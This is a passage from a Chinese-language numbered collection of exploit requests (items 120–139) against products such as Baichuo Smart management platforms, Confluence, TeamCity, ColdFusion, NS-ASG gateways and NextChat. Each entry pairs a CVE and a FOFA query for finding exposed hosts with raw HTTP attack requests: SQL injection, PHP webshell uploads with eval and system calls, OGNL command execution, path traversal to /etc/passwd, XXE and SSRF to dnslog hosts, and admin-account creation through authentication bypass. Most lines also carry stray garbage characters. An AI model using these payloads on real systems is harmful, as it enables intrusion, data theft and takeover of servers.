/ V" X! k. c. v# M/ A( [, I/ lX-Originating-Ip: 1.1.1.18 @2 K6 \$ Y. U P+ a
X-Remote-Ip: 1.1.1.12 h: n; J0 U/ E. R9 b( ~
X-Remote-Addr: 1.1.1.1
. @ [( [- q3 n6 H5 A# f) y# PTe: trailers
- ^/ V6 l/ b% k+ IConnection: close# u0 {7 r- R4 F3 d5 Z& `. A
; j9 D" `3 Z2 r0 M5 Q _src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234566 f+ P+ Y* r+ x
, @7 z7 w# O0 j. p# X
9 C2 k5 B( Y* v7 r/ {. Z120. 北京百绰智能S40管理平台导入web.php任意文件上传/ C& t$ [& U; V$ p; V8 r, `
CVE-2024-1253; ~# L7 w4 g" F) W6 C% P1 v
FOFA:title="Smart管理平台"
; a/ I* L! A( e9 C/ ?POST /useratte/web.php? HTTP/1.1" P! k$ ~9 g3 c3 q/ O1 X
Host: ip:port
7 W% E0 u1 ~% UCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
. P. B) _, ~. ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
7 ]8 e e) R* C/ }9 ?& p7 W( I, FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 m- J/ J H! L7 X2 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% {6 b7 ]7 @* S) |$ J
Accept-Encoding: gzip, deflate2 m/ ]% z- O8 S4 f# ]
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' N: I& R/ l- Y) N5 m! Y% HContent-Length: 5978 ~ h2 e8 |* u5 H
Origin: https://ip:port. E u( _! L T
Referer: https://ip:port/sysmanage/licence.php
. G& T! a5 K' H3 aUpgrade-Insecure-Requests: 1+ k; ?* a2 z, M0 N3 \3 X
Sec-Fetch-Dest: document
6 n( r1 D# e) t6 Y) O& V- f4 JSec-Fetch-Mode: navigate3 g+ l: @5 S/ O
Sec-Fetch-Site: same-origin! G* f( Z; |+ E6 H8 Y: I
Sec-Fetch-User: ?1
: W/ ^: l. r" ~9 f8 ~7 `Te: trailers
; F% h3 _( U. g( Y; ^6 _Connection: close
* [ M: z; N1 f z2 \
/ u) s: O4 O! c; A) |-----------------------------42328904123665875270630079328
! q1 Y# F/ } w1 S; J" P/ V A; vContent-Disposition: form-data; name="file_upload"; filename="2.php"+ V. F. s2 [; S
Content-Type: application/octet-stream
' `$ H! H: P# D1 e6 T1 ^8 |" F* `! m3 R% z8 M) z. c0 i
<?php phpinfo()?>
$ u. ?5 P. n, z% Z5 l) v+ [" R-----------------------------42328904123665875270630079328
9 H# @6 x* I3 J: Z, s/ w5 P" dContent-Disposition: form-data; name="id_type", J4 h+ I N& S* t4 }
* U( u) ~8 d& t1 }3 F
1& ~' i* M( {; U" p J1 l7 m, J
-----------------------------42328904123665875270630079328
1 M6 s6 N$ I0 k7 qContent-Disposition: form-data; name="1_ck"
/ W: r% w* n- M& @
- f1 j' |3 C- O6 B, R1 }1_radhttp
4 m% k: {: o5 M7 h-----------------------------42328904123665875270630079328
6 y4 W% G- a8 [' pContent-Disposition: form-data; name="mode"
( t( `/ M, z3 M& \% x+ g
/ \; Q. T4 }9 q. kimport( ^: p! _- \" a: A
-----------------------------42328904123665875270630079328. g0 Y4 \$ @ ^" Q. w
I2 w8 {2 o1 k8 U) H. [5 {( |
( }6 y6 V, T, T( G文件路径/upload/2.php9 [* P4 ?' D. d( X
8 @7 u) ]3 Y5 q( z) X e& I$ B4 X4 K121. 北京百绰智能S42管理平台userattestation.php任意文件上传
7 C& V/ K/ T3 D3 q: [; ^( U- ICVE-2024-1918 D6 }1 }+ y: O# g
FOFA:title="Smart管理平台"
- w6 A1 s' E1 A6 BPOST /useratte/userattestation.php HTTP/1.1
# h& u' s' h4 B' ?& cHost: 192.168.40.130:8443
0 J3 n& T4 O0 V k W8 [; RCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac503 K# {3 @* z! A, E4 ~; ?5 e
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko5 w4 m* l0 A, H7 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 j- R, g6 H/ x* o6 q& y0 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! y# u8 G* s7 \& ?- b7 [. ]/ H) H$ x
Accept-Encoding: gzip, deflate8 R% A* \) t( B" _
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328* V" {8 H- I# ?/ G4 s' k+ h z
Content-Length: 592
( H, w6 e$ ]8 ~, P9 p1 sOrigin: https://192.168.40.130:84439 i8 C- F& ^' k# V! t& o1 N' }; s
Upgrade-Insecure-Requests: 1& D% N3 I# P+ L
Sec-Fetch-Dest: document7 k* h% N) m: }" [- B2 p
Sec-Fetch-Mode: navigate! t7 d3 l" \( U# _( y' h
Sec-Fetch-Site: same-origin
, ]% u* O' u& s, [7 }1 gSec-Fetch-User: ?11 M* e1 t/ M! D" T
Te: trailers! l- b8 e8 A8 _
Connection: close5 ?# `: Q; y: [9 H2 z, N5 I/ Z6 ]6 g
! a- F, y( ^+ ]8 b
-----------------------------42328904123665875270630079328
7 i- Y% P7 g1 q0 [Content-Disposition: form-data; name="web_img"; filename="1.php"
( c! ]5 Y- `/ y, DContent-Type: application/octet-stream7 u c( }& v/ J5 Z. R: w$ ~3 p
4 a3 U# y" _& o( r/ P<?php phpinfo();?>/ o8 q9 ^' a& `% m$ r# j
-----------------------------42328904123665875270630079328
, L4 c& c. | cContent-Disposition: form-data; name="id_type"; f# E2 L0 ^) H& P9 J
2 f3 w9 x. S/ w6 D* L6 x1. G8 g1 V4 t0 E; q8 k4 k1 f
-----------------------------42328904123665875270630079328
, z0 C% T S; y! y4 @Content-Disposition: form-data; name="1_ck"9 P9 r4 Z8 [* F% x7 a
$ V2 e' P- W' x. Z) f
1_radhttp
1 I3 u: L, H: R9 l9 F4 B-----------------------------42328904123665875270630079328
7 t* m( \/ e6 }; qContent-Disposition: form-data; name="hidwel"0 U6 e, \" ~% z. s g" L) T
8 m1 O2 S& Z' x: V4 kset
4 T/ q' [. o* F% _4 ]-----------------------------423289041236658752706300793282 \9 e! N% m$ z$ G7 |# m
# D# c2 t5 B! Q0 a9 o2 k
6 b4 w2 E: k$ M, B/ y# t
boot/web/upload/weblogo/1.php
7 i* M! z- d, y+ Z
% z$ ~/ ~; l2 i& _ N122. 北京百绰智能s200管理平台/importexport.php sql注入
2 f# z2 `, {9 w! O2 w. pCVE-2024-27718FOFA:title="Smart管理平台"
+ x: ^7 ~ D; n3 @+ R其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
. M% J5 x4 y X. a' xGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.12 C" c# @( h$ O" `6 b5 k' o; i5 x
Host: x.x.x.x
) f1 O0 H- R' m6 p3 Z. _8 FCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0# i2 h3 T* h- ]8 S) D) [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
^. [5 Z* F. @6 f7 @ sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( c; b5 f4 v Q- y" f1 M5 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- z7 v1 u' d$ YAccept-Encoding: gzip, deflate, br
( A6 [, _+ s( X3 O* R& U' v* J) fUpgrade-Insecure-Requests: 1* k# g9 U, ^. d+ O- Y$ N
Sec-Fetch-Dest: document
: P2 f6 _- \ T" d5 i. ZSec-Fetch-Mode: navigate/ Z7 H8 m5 B2 e/ s1 D
Sec-Fetch-Site: none
# M6 D" v$ D+ P! [Sec-Fetch-User: ?1, l* a4 K& L/ f' x1 _
Te: trailers
; R/ Q# v: f1 x4 `Connection: close
' C; v$ w$ O7 z# J) n. V- x# A' Y5 |) z$ _1 }, [
; f9 v! {$ J; K; \; ?, V4 i
123. Atlassian Confluence 模板注入代码执行1 z1 E! Y+ ^7 t& ^5 D" o
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"" X' @. C3 |) m5 h
POST /template/aui/text-inline.vm HTTP/1.1
9 p* s/ R" a$ ?# n9 [Host: localhost:8090. G- @" p3 t# O# [! I# M3 n
Accept-Encoding: gzip, deflate, br
7 R+ t% q( p& X% U! {Accept: */*
8 r9 r; v' u, q* G$ b/ S7 ^Accept-Language: en-US;q=0.9,en;q=0.8; X6 A: u, \" Z1 [& M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36+ e3 K& z* W s: L$ }( x
Connection: close
V8 A C$ R2 t2 m7 X3 HContent-Type: application/x-www-form-urlencoded/ w# u& e+ [! n; E8 J
) H7 I8 |- u/ E3 A; U% A& @# Z1 P
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
. H. F. v5 i+ o0 ?9 D8 m8 r
4 }+ k* d7 v! ~$ {5 P5 {' I5 J- h% O
124. 湖南建研工程质量检测系统任意文件上传
% K2 j, @3 t1 u2 E/ pFOFA:body="/Content/Theme/Standard/webSite/login.css"/ ]) h, O: ^2 S. X/ `! N/ l) t
POST /Scripts/admintool?type=updatefile HTTP/1.1
5 g, s" c' k& U. JHost: 192.168.40.130:8282
+ J9 v* h3 F! }+ `User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" f7 s$ V7 I8 O% x% N) ]4 }9 N6 uContent-Length: 72
* O) w4 o, J/ A4 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
! z! m3 `' r" |( x4 I9 [, XAccept-Encoding: gzip, deflate, br; ]! u# C' f8 D6 e# Z( ?/ A- d* Q( ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 b/ S7 ^# q8 C( R& F$ E* \0 DConnection: close( M& d3 M+ E$ P
Content-Type: application/x-www-form-urlencoded" E* f! g% n W
4 m3 i1 l% H1 T6 O* H. H
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>1 u( F1 g+ y7 A0 |
$ J1 W% o, E1 u: Y" Y! x* y- Z& v+ t1 Y$ k% `
http://192.168.40.130:8282/Scripts/abcgcg.aspx
7 v; \# W' G) U7 H# C- Z1 l
. D0 r1 ~9 X' ]6 R+ H n125. ConnectWise ScreenConnect身份验证绕过0 ^9 b6 {4 R3 g! h4 M
CVE-2024-1709
5 z- a" I; q/ I' X* p4 V2 X f* _: JFOFA:icon_hash="-82958153"
% D; u+ k# A/ Bhttps://github.com/watchtowrlabs ... bypass-add-user-poc
/ O* n; _" e0 s" d2 |$ V% w8 I1 L) u- b& I
" H) A$ |5 q* r& r2 U使用方法
9 Q5 g/ J, S" j2 a# c( R8 N) zpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123! d4 E: p; d; U' w+ c$ j
7 D9 {; Q1 a# B4 a9 `6 R
( j/ L) _5 |+ h. [. F, v
创建好用户后直接登录后台,可以执行系统命令。. g" {# `- x* i
& i& b- G8 z1 n/ d126. Aiohttp 路径遍历 z, Q! i- J! ?' V
FOFA:title=="ComfyUI"
3 u2 ?: Q$ i# V( SGET /static/../../../../../etc/passwd HTTP/1.1
& m' t% K! J- ]1 XHost: x.x.x.x% E% @ G& k0 T4 S, V) d' X( G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 l2 b% c% W7 R! u0 S2 u& O
Connection: close( A1 B+ O! B" c" I {) Q$ T
Accept: */*
+ ]: H& _3 P8 o0 X" \7 `2 tAccept-Language: en. z. I5 [, ?& }" H, D5 f
Accept-Encoding: gzip
2 X8 l# o3 P, d3 t x0 S9 H H" I; L+ P! z9 b- f/ n
% a3 T8 m% L9 d8 H
127. 广联达Linkworks DataExchange.ashx XXE; s: ?+ `9 w/ X- l6 S
FOFA:body="Services/Identification/login.ashx" 2 a+ x/ J, L- B# R2 g) E
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
X d2 c% M/ ?0 ^6 GHost: 192.168.40.130:8888, Q' j7 P. z+ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
$ r6 B6 Z8 {' r8 ~3 @Content-Length: 415
) A6 I7 A) R8 ?0 g# hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 k) u) e9 `$ j# P& ?$ S4 JAccept-Encoding: gzip, deflate
x& H. w* C- ?9 N# M4 A& z- cAccept-Language: zh-CN,zh;q=0.9' s+ \5 v( ~ s) G& y% b6 |
Connection: close* g# B6 p. C y0 X
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
1 A! d# U% Q: P9 ]. P4 lPurpose: prefetch4 ^* L" s- M7 A0 e: o) a
Sec-Purpose: prefetch;prerender* ]1 @* M6 |4 q1 ]* W
$ n9 n C Z5 R3 U: n6 X------WebKitFormBoundaryJGgV5l5ta05yAIe03 y/ {; @- U% `) J$ Q# Y
Content-Disposition: form-data;name="SystemName"
% X) b8 k" B4 L6 ?
, g6 U2 {; |' f& }* n9 pBIM" n) r! p# p! n
------WebKitFormBoundaryJGgV5l5ta05yAIe0
5 p6 J+ t4 U3 E( q2 gContent-Disposition: form-data;name="Params"
v" p3 N4 L' e6 @4 zContent-Type: text/plain. l2 M2 z& t9 ]% ]$ W! E
( Q. H2 f* u2 b# q( b. [/ X
<?xml version="1.0" encoding="UTF-8"?>. N, r- o9 }3 C9 s( e t
<!DOCTYPE test [0 i! ~% y8 S5 B' T6 I
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
2 y k. j0 s8 S& P- c7 K]" g V* K8 a' p1 A3 u; t$ j
>
( o; _' {: m1 p; Y/ o) D1 v<test>&t;</test>3 J& T$ v6 s5 G9 g+ k! z# }
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
( I3 n; q" t- Z0 M" s5 ~% e4 M: a( p/ i9 ]3 x
4 x/ Z; w, m. c0 h2 O6 f4 E# p. ]% A
; d# @& P+ U. `: f. O$ f$ v128. Adobe ColdFusion 反序列化2 t6 q7 m0 S3 v- M+ }, _8 I
CVE-2023-38203
, n8 D9 b( o! M5 ~& d7 W, wAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
0 v" T! S6 c: l, }5 b; X) TFOFA:app="Adobe-ColdFusion"+ Q8 @ W; b8 a2 P- ~2 z0 R) {
PAYLOAD% H6 Q) w- V6 {% {- X9 W5 p
# A9 K0 H$ W8 V129. Adobe ColdFusion 任意文件读取
: r) H) {5 G6 RCVE-2024-20767
# ]5 j5 }0 x4 L$ g% q3 J3 @FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"/ F. `1 i" I' J1 N( c. F, l9 U
第一步,获取uuid
: O( y0 S/ J4 J& T) IGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1) f/ U3 f' @: c* ?
Host: x.x.x.x
J/ r b, W+ U: F, dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 R2 {& z- {6 f8 |Accept: */*
6 j1 o& w; o; v) b) X. L! e& _, ?Accept-Encoding: gzip, deflate9 {; r6 l% x6 c5 O
Connection: close
6 v' d0 Y9 B/ j# }) B/ n# P% a6 r! G
* ~2 z+ j# \1 S$ Z0 ^
+ A' n Z& Z& b3 D第二步,读取/etc/passwd文件
0 f' t8 |6 O6 U" {( p, Q1 W4 oGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.11 n# {. |! ~$ @# f1 ~: z- k
Host: x.x.x.x
9 q7 X* f' u* t8 e; L9 @. hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. S' }' z/ |/ ?+ e8 b5 [Accept: */*( T: C4 E. J, p( K4 H; ?) W
Accept-Encoding: gzip, deflate/ R# M- ^% k1 y3 n* ?( _
Connection: close
/ }7 r8 n/ N- y c! q# `, ~uuid: 85f60018-a654-4410-a783-f81cbd5000b97 G8 S7 ~5 I4 y9 N/ O( q/ K% w
3 M9 E0 F/ I' l" ~$ y; }" a
& A$ y% S+ N7 x* J130. Laykefu客服系统任意文件上传
/ B$ ^% y# t; ^FOFA:icon_hash="-334624619"/ E) I) Y+ o1 n/ m
POST /admin/users/upavatar.html HTTP/1.1/ `; f1 y& v0 Y8 k
Host: 127.0.0.1: O% z' a1 v9 } W+ Q7 U5 f# d
Accept: application/json, text/javascript, */*; q=0.01; P3 O7 S$ `! f+ [, ?$ r6 b6 r' n
X-Requested-With: XMLHttpRequest
& L O0 |0 [" C6 u7 Q2 [0 ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
% z: [$ }! d* r; h/ e, zContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
1 V" ?! m, w. Z( D9 `Accept-Encoding: gzip, deflate- f* p) t3 c( q
Accept-Language: zh-CN,zh;q=0.9+ V- m- f$ H& _; y6 W6 i) {
Cookie: user_name=1; user_id=3
, ]- R# C% _$ OConnection: close
2 ?) X* v2 K# a* J) E9 m9 Z/ i5 ^0 V' W3 K! s* N% r
------WebKitFormBoundary3OCVBiwBVsNuB2kR% Y* K# \4 b" ~' u8 a- ^* C
Content-Disposition: form-data; name="file"; filename="1.php"
9 s/ c' I9 i8 e6 |Content-Type: image/png5 k* A# _ c6 Q2 [
* q! g+ D/ j) E/ x. O# V
<?php phpinfo();@eval($_POST['sec']);?>
" A/ W7 R$ i! u# v- T4 ^+ ]' ~( q. N------WebKitFormBoundary3OCVBiwBVsNuB2kR--
, y+ W7 \; ^( Q$ T8 w
# B2 X9 N6 k; ~) T2 a1 r2 [2 J4 q% J/ a1 v( Q$ E: p, {
131. Mini-Tmall <=20231017 SQL注入" c& k) _, B: V/ a
FOFA:icon_hash="-2087517259"- w1 G. ~$ z, j u7 f
后台地址:http://localhost:8080/tmall/admin
: N; M8 p) y7 |2 R" c; Y3 Qhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
2 E, J; l3 s8 ]/ Q
1 P" R6 u4 O3 d6 b: _7 n132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
$ N9 U# S. O' V. f* e2 lCVE-2024-27198
F: D) G3 R& X7 NFOFA:body="Log in to TeamCity"8 Z6 w1 ]* [# A/ W p0 O1 N9 K
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
( ]% m: {2 J' Q; L. _3 G" YHost: 192.168.40.130:8111. `& [. S; b6 o( x" K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ C2 ^% _2 B$ _ V! U0 { p* qAccept: */*
N2 Q" Z4 R6 y/ BContent-Type: application/json
( a! I4 D x# @. yAccept-Encoding: gzip, deflate
( b1 X, k5 K: `
! |) I- A9 t8 X" \{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
# b. k+ C( R% _/ A! L+ p/ l5 Y# U
' S# S' N# u+ u; Y0 g$ B( H K+ g4 B/ \8 r
CVE-2024-27199
. m7 S4 O$ i i/ N5 h+ B4 q9 [4 e3 K" O/res/../admin/diagnostic.jsp
8 ? r1 R' J4 f0 e/.well-known/acme-challenge/../../admin/diagnostic.jsp# f* z% T: {- m8 f& `" B: h) G7 V
/update/../admin/diagnostic.jsp, O" h- `# E W# f1 ~& `
0 _7 P- L& P8 A
$ X1 k7 f. J9 T( ?4 i# SCVE-2024-27198-RCE.py+ x% X2 N: ~6 j9 ]( h% b) k
4 H. u3 d, w- K) c/ P
133. H5 云商城 file.php 文件上传
$ L, G b( k( p+ p9 jFOFA:body="/public/qbsp.php"2 f7 [# [* _7 Y1 N4 c9 T' ~! d5 A# ^
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
' j( l, k+ X- a- H7 E3 \. CHost: your-ip) Y) S' W7 ^6 S2 x. e# e1 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
9 j+ I3 @8 f$ |5 kContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx+ b. N& ^+ E% T2 y9 g
* y2 m8 b* c$ @: ?, v2 J2 P
------WebKitFormBoundaryFQqYtrIWb8iBxUCx: [4 h; ^9 L3 \6 K
Content-Disposition: form-data; name="file"; filename="rce.php"+ j9 `2 v# ]% ~6 C9 H# u
Content-Type: application/octet-stream' ~0 R# w- s% }+ Q
# t9 R8 J) d4 b+ ]3 Q2 _) ]<?php system("cat /etc/passwd");unlink(__FILE__);?>
; M- u9 o5 l& x7 U& o------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
' H+ f# E/ K& O! {) q1 @( L, q7 ?. o2 d8 `9 `
1 w: b% w9 ?, c2 k; L! Z/ u) }# f* x' D1 A
134. 网康NS-ASG应用安全网关index.php sql注入+ a5 x9 ]* Z; G3 h* U
CVE-2024-2330
( C' o6 r- M7 s: i1 H8 e! `2 ^Netentsec NS-ASG Application Security Gateway 6.3版本4 z- j' @9 s+ d! R* B E: u9 Y
FOFA:app="网康科技-NS-ASG安全网关"
- T% h- N! T2 s) V' Z1 ^6 `0 q9 rPOST /protocol/index.php HTTP/1.1
) j' x0 d% j# B$ {% v( j' oHost: x.x.x.x) P1 e4 G6 _6 c. R! \1 X$ ~
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
% Y# E. N% {4 C' WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
2 n6 l! X- A* }; L- T8 k. r9 J1 nAccept: */*/ d+ Y9 @% O+ T/ {4 X; }8 }2 O% R( P! w3 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" h2 e: l6 B: g, ]Accept-Encoding: gzip, deflate* a% b0 t2 i+ C8 o# [1 `
Sec-Fetch-Dest: empty
) H Y+ K1 y4 l; W+ V5 ]1 vSec-Fetch-Mode: cors
! A$ d3 m- K: x7 L" W5 H2 u; YSec-Fetch-Site: same-origin
0 z$ M$ V" q$ _3 s6 ~3 z, F7 u8 \Te: trailers
* `6 N( Y8 d* |, a4 h dConnection: close
o# X+ I8 b! |$ C; B) Q" `9 YContent-Type: application/x-www-form-urlencoded
* v1 x+ S" Z: q# Z+ B! ^; y/ d& R2 AContent-Length: 263
4 D! m1 K' y; ], l. B9 R$ B0 ~9 o
% M- a6 ^0 c( I% o1 y6 njsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}2 s; l, K$ F, Q; n
1 ]& c; e! {( |
* Z- M% z' S( I! n3 ^8 Q5 u; X5 x135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
. i) \3 U8 B7 ^# ]( b( Q$ u( I9 QCVE-2024-20229 s: {3 c0 {* |5 n
Netentsec NS-ASG Application Security Gateway 6.3版本
( F; |" [+ j2 e" v3 v# KFOFA:app="网康科技-NS-ASG安全网关"3 ~8 q) ]: z) t! S7 J
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.12 ~+ }+ y7 z0 O5 W; i8 j8 U4 E
Host: x.x.x.x
; i0 q+ S* P- X7 l$ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" a' F" B4 f8 Z: I7 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 @7 ~& q( d& r. N/ m* i
Accept-Encoding: gzip, deflate
# B0 k( i# I) n9 m9 v, W4 KAccept-Language: zh-CN,zh;q=0.9
6 d5 ^0 X/ E& w) FConnection: close+ ~3 Y+ V6 c4 L: w) S" b) g: n5 h
' D: `) s/ d3 E2 W' D+ N2 m
5 V- N ^/ z7 x0 u136. NextChat cors SSRF
2 y! T- P6 C4 RCVE-2023-49785
$ `, i# ~: e4 X! R9 s, u( F* p8 IFOFA:title="NextChat"8 V. t) m2 r- b# j
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1, F+ R* w( m K- W5 K
Host: x.x.x.x:10000- d. X* R8 W3 P( r' x" X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 ~# R* F+ ~ y4 E
Connection: close5 H" z2 B! R# i& K5 O9 I
Accept: */*
* k( ` E& m$ q% E* M0 oAccept-Language: en/ A+ k1 C/ t, f3 ~1 k' z
Accept-Encoding: gzip. `6 e' {8 U7 e: \! e
/ D. ]# Q; D( O% v6 }
+ _% G, E3 C; g( q& P137. 福建科立迅通信指挥调度平台down_file.php sql注入
2 g6 Y: C9 V9 T1 ICVE-2024-26206 G0 @% w" [8 C$ l
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- C4 k1 v8 X2 ^# b. M- w1 uGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1' i$ m# ]$ E Q" j
Host: x.x.x.x4 q* X- y' ^) B: n' I b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 n- w9 X: R7 l ?- W: KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 P2 ^" g. G1 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. B) ]# G8 [/ Y: o2 |. b
Accept-Encoding: gzip, deflate, br; v; T9 w H) J0 f) U2 u
Connection: close
) x$ O% [7 q) [+ C3 WCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
& Z1 V5 J s6 vUpgrade-Insecure-Requests: 1
3 I2 C/ L* j! W, c8 w- v4 ]# s! j- x; p8 p
# G1 L* `4 c: s* h" O- Z9 n
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
z- V( B" i. L7 }9 PCVE-2024-2621) q# M- E& d( K4 v1 M' N
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"" H7 k6 @/ g% @2 v0 t, x
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.13 A8 a+ s* W; A" s
Host: x.x.x.x1 k3 f1 r } N; v3 v( `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 m- t0 Z) I8 V9 \$ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% I6 R" k. c1 E; \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 [ `7 ?( Q& b8 b: K- ^; l" _4 I
Accept-Encoding: gzip, deflate, br
, w9 r( O7 |3 i& mConnection: close
$ m8 @7 l6 B& w! t$ a) OUpgrade-Insecure-Requests: 1! l1 z0 o+ ~7 p J- D
$ a: s1 X7 L4 r$ Z* P) @; }% d! K& e
- q. ?. _ t5 a139. 福建科立讯通信指挥调度平台editemedia.php sql注入; h% p5 T$ {2 e: Z7 A, [
CVE-2024-2622' a. p5 B0 n7 ~ |
